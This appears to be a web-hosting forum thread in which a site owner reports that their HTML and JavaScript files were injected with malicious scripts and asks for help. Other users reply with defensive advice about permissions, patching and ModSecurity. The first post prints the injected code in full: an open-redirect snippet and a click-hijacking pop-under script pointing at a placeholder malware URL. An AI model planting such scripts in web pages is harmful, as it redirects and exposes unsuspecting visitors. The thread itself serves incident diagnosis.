Results 1 to 5 of 5
  1. #1
    Join Date
    Apr 2009
    Posts
    1,320

    Angry Javascript hacking / injection on my server

    A lot of my htm html and js files have been injected with these codes which opens a popup when I click anywhere on the web page. I've removed the URL of the popup that it opens when posting the codes here.

    I already set these files to 444 permission, how is the hacker still able to inject these malicious codes into my files?

    Code:
    <Script>
    var rr = location.search.substring(1);
    if(rr)window.location=decodeURIComponent(rr);
    </Script>
    Code:
    <script language="javascript">if (navigator.cookieEnabled){var pop_under = null;var pop_cookie_name = "snipped";var pop_timeout = 720;function pop_cookie_enabled(){var is_enabled = false;if (!window.opera && !navigator.cookieEnabled)return is_enabled;if (typeof document.cookie == 'string')if (document.cookie.length == 0){document.cookie = "test";is_enabled = document.cookie == 'test';document.cookie = '';}else{is_enabled = true;}return is_enabled;}function pop_getCookie(name){var cookie = " " + document.cookie;var search = " " + name + "=";var setStr = null;var offset = 0;var end = 0;if (cookie.length > 0){offset = cookie.indexOf(search);if (offset != -1){offset += search.length;end = cookie.indexOf(";", offset);if (end == -1){end = cookie.length;}setStr = unescape(cookie.substring(offset, end));}}return(setStr);}function pop_setCookie (name, value){document.cookie = name + "=" + escape(value) + "; expires=Friday,31-Dec-50 23:59:59 GMT; path=/;";}function show_pop(){var pop_wnd = "http://domain.com/virus/url/";var fea_wnd = "scrollbars=1,resizable=1,toolbar=1,location=1,menubar=1,status=1,directories=0";var need_open = true;if (document.onclick_copy != null)document.onclick_copy();if (document.body.onbeforeunload_copy != null)document.body.onbeforeunload_copy();if (pop_under != null){if (!pop_under.closed)need_open = false;}if (need_open){if (pop_cookie_enabled()){val = pop_getCookie(pop_cookie_name);if (val != null){now = new Date();val2 = new Date(val);utc32 = Date.UTC(now.getFullYear(), now.getMonth(), now.getDate(), now.getHours(), now.getMinutes(), now.getSeconds());utc2 = Date.UTC(val2.getFullYear(), val2.getMonth(), val2.getDate(), val2.getHours(), val2.getMinutes(), val2.getSeconds());if ( ( utc32 - utc2 ) / 1000 < pop_timeout*60){need_open = false;}}}}if (need_open){under = window.open(pop_wnd, "", fea_wnd);under.blur();window.focus();if (pop_cookie_enabled()){now = new Date();pop_setCookie(pop_cookie_name, now);}}}function pop_init(){var ver = parseFloat(navigator.appVersion);var ver2 = (navigator.userAgent.indexOf("Windows 95")>=0 || navigator.userAgent.indexOf("Windows 98")>=0 || navigator.userAgent.indexOf("Windows NT")>=0 )&&(navigator.userAgent.indexOf('Opera') == -1)&&(navigator.appName != 'Netscape') &&(navigator.userAgent.indexOf('MSIE') > -1) &&(navigator.userAgent.indexOf('SV1') > -1) &&(ver >= 4);if (ver2){if (document.links){for (var i=0; i<document.links.length; i++){if (document.links[i].target != "_blank"){document.links[i].onclick_copy = document.links[i].onclick;document.links[i].onclick = show_pop;}}}}document.onclick_copy = document.onclick;document.onmouseup = show_pop;}pop_init();}</script>

  2. #2
    Join Date
    Dec 2002
    Posts
    374
    Have you scanned your PC?

  3. Have you changed passwords ? server, cpanel, etc?

  4. #4
    Join Date
    Apr 2009
    Posts
    1,320
    This is not password intrusion, it's a security exploit I am sure, but I don't know how they are doing it. This is very common like the iframe injections all over the web.

  5. #5
    Join Date
    Aug 2005
    Location
    Durham, NC USA
    Posts
    195
    If the hacker can get either root or owner privileges, then they can reset permissions on those files as needed.

    If your server is running suexec or suphp, then getting owner privileges (assuming they've already got a way to inject code) would be fairly easy.

    Finding how they're injecting the code in the first place is the tricky bit. Check your php.ini and make sure that's all locked down, make sure the server is fully patched, especially php and apache.

    If you've installed ModSecurity, then check your logs to see if it has any warnings about the infected files. If you haven't installed it, you may want to.

    Let us know what you find.

    Akin
    Netmar Web Services - Reliable Web Hosting for 15 years
    Shared hosting, business hosting, domain name registration, and VMware virtual servers
    Specializing in Drupal hosting
    Call 866-363-8627 (toll-free) and ask about our Drupal accounts

Similar Threads

  1. HELP: javascript / code injection
    By bigdm in forum Hosting Security and Technology
    Replies: 5
    Last Post: 01-24-2011, 04:09 PM
  2. Javascript file injection issue getting hit a second time
    By Mikie4648 in forum Computers and Peripherals
    Replies: 1
    Last Post: 05-27-2010, 05:31 PM
  3. Advice sought Apache - possible javascript injection attack?
    By nauae in forum Hosting Security and Technology
    Replies: 4
    Last Post: 09-01-2008, 01:29 PM
  4. php injection & session hacking problem
    By smruthi in forum Hosting Security and Technology
    Replies: 3
    Last Post: 05-28-2008, 11:30 AM
  5. Hacking server !!! not hacking accounts anymore
    By AndyJ in forum Hosting Security and Technology
    Replies: 22
    Last Post: 01-24-2005, 04:53 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •